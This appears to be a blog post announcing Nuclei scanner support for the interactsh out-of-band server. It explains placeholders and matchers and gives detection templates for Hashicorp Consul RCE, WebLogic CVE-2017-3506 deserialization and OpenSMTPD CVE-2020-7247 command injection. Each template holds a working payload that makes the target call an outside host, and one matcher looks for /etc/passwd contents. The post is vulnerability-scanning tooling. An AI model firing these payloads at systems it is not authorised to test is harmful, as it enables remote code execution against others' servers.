Authors
We released interactsh, a server that can emulate a DNS, HTTP, HTTPS and SMTP server, allowing users to test for Out of Band Security vulnerabilities.
Nuclei v2.3.6 now supports using the interact.sh API to achieve OOB based vulnerability scanning with automatic Request correlation built in. It's as easy as writing {{interactsh-url}}
anywhere in the request, and adding a matcher for interact_protocol
. Nuclei will handle correlation of the interaction to the template & the request it was generated from allowing effortless OOB scanning.
How it works?
Nuclei engine checks the presence of matchers for interact_protocol
and if detected, interactsh support is enabled for the request. What this means is the request will be checked for {{interactsh-url}}
placeholders, and if detected they will be replaced on the fly with a random interact.sh url and polled by nuclei continuously for interactions.
The support is enabled in such a way that only a single poll request is necessary to get all the interactions for any number of unique URLs generated per session of nuclei. Internally, nuclei maintains an LRU cache of all the requests, with a max limit that can be tuned with -interactions-cache-size
flag. By default, this value is set to 5000 requests with requests getting evicted every 60 seconds. Nuclei polls for interactions every 5 seconds.
You can also use self-hosted interactsh server with nuclei by passing self-hosted url using interactsh-url
flag, as default it uses https://interact.sh
Placeholder Support
{{interactsh-url}}
placeholder is supported in http
and network
requests.
An example of nuclei request with {{interactsh-url}}
placeholders is provided below. These are replaced on runtime with unique interact.sh URLs.
yaml
1- raw:
2 - |
3 GET /plugins/servlet/oauth/users/icon-uri?consumerUri=https://{{interactsh-url}} HTTP/1.1
4 Host: {{Hostname}}
Matching for Interactions
Matching is very easy with interactsh nuclei integration. Just add a standard nuclei word
, regex
or dsl
matcher/extractor with parts that can be -
interactsh_protocol
- Value can bedns
,http
orsmtp
. This is the standard matcher for every interactsh based template withdns
often as the common value as it is very non-intrusive in nature.-
interactsh_request
- The request that the interact.sh server recieved. -
interactsh_response
- The response that the interact.sh server sent to the client.
yaml
1matchers:
2 - type: word
3 part: interactsh_protocol # Confirms the DNS Interaction
4 words:
5 - "dns"
These interactsh specific matchers can be combined with matchers on the parts of the request such as body
, raw
with matchers-condition: and
to achieve precise scanning.
yaml
1matchers-condition: and
2matchers:
3 - type: word
4 part: interactsh_protocol # Confirms the DNS Interaction
5 words:
6 - "dns"
7
8 - type: regex
9 part: interactsh_request # Confirms the retrieval of etc/passwd file
10 regex:
11 - "root:[x*]:0:0:"
12
13 - type: status
14 status:
15 - 200
Some Examples
The below template is an example demonstration of the OOB capabilities of nuclei. It detects hashicorp consul Services API RCE with interact.sh OOB server.
yaml
1id: hashicorp-consul-rce
2
3info:
4 name: Hashicorp Consul Services Api RCE
5 author: pikpikcu
6 severity: critical
7 reference: https://www.exploit-db.com/exploits/46074
8 tags: hashicorp,rce,oob
9
10requests:
11 - raw:
12 - | # Create USER
13 PUT /v1/agent/service/register HTTP/1.1
14 Host: {{Hostname}}
15 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
16 Connection: close
17 Upgrade-Insecure-Requests: 1
18 Content-Length: 205
19
20 {
21 "ID": "{{randstr}}",
22 "Name": "{{randstr}}",
23 "Address": "127.0.0.1",
24 "Port": 80,
25 "check": {
26 "script": "nslookup {{interactsh-url}}",
27 "interval": "10s",
28 "Timeout": "86400s"
29 }
30 }
31 matchers:
32 - type: word
33 part: interactsh_protocol # Confirms the DNS Interaction
34 words:
35 - "dns"
The below template detects Weblogic RCE by deserialization using interact.sh OOB server of nuclei.
yaml
1id: CVE-2017-3506
2
3info:
4 name: Oracle Weblogic Remote OS Command Execution
5 author: pdteam
6 description: Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (Web Services). Supported versions that are affected are 10.3.6.0, 12.1.3.0, 12.2.1.0, 12.2.1.1 and 12.2.1.2. Difficult to exploit vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server.
7 severity: high
8 tags: cve,cve2017,weblogic,oracle,rce,oob
9 reference: |
10 - https://hackerone.com/reports/810778
11 - https://nvd.nist.gov/vuln/detail/CVE-2017-3506
12requests:
13 - raw:
14 - |
15 POST /wls-wsat/RegistrationRequesterPortType HTTP/1.1
16 Host: {{Hostname}}
17 Content-Type: text/xml
18 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0,
19 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8,
20 Content-Type: text/xml;charset=UTF-8
21 Content-Length: 873
22
23 <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
24 <soapenv:Header>
25 <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
26 <java version="1.8" class="java.beans.XMLDecoder">
27 <void id="url" class="java.net.URL">
28 <string>http://{{interactsh-url}}</string>
29 </void>
30 <void idref="url">
31 <void id="stream" method ="openStream"/>
32 </void>
33 </java>
34 </work:WorkContext>
35 </soapenv:Header>
36 <soapenv:Body/>
37 </soapenv:Envelope>
38 matchers:
39 - type: word
40 part: interactsh_protocol # Confirms the DNS Interaction
41 words:
42 - "dns"
A network template for OpenSTMPd that detects RCE by OOB request is also given below.
yaml
1id: CVE-2020-7247
2info:
3 name: OpenSMTPD 6.4.0 - 6.6.1 Remote Code Execution
4 author: princechaddha
5 severity: critical
6 reference: https://www.openwall.com/lists/oss-security/2020/01/28/3
7 tags: cve,cve2020,smtp,opensmtpd,network,rce
8
9network:
10 - inputs:
11 - read: 1024
12 - data: "helo target\r\n"
13 read: 1024
14 - data: "MAIL FROM:<;nslookup {{interactsh-url}};>\r\n"
15 read: 1024
16 - data: "RCPT TO:<root>\r\n"
17 read: 1024
18 - data: "DATA\r\n"
19 read: 1024
20 - data: "\r\nxxxx\r\n.\r\n"
21 read: 1024
22 - data: "QUIT\r\n"
23 read: 1024
24 host:
25 - "{{Hostname}}:25"
26
27 matchers-condition: and
28 matchers:
29 - type: word
30 part: interactsh_protocol
31 words:
32 - "dns"
33
34 - type: word
35 part: raw
36 words:
37 - "Message accepted for delivery"
Got questions about Interactsh or nuclei integration? Feel free to tweet us at @pdnuclei or jump in our discord server to discuss more security and automation.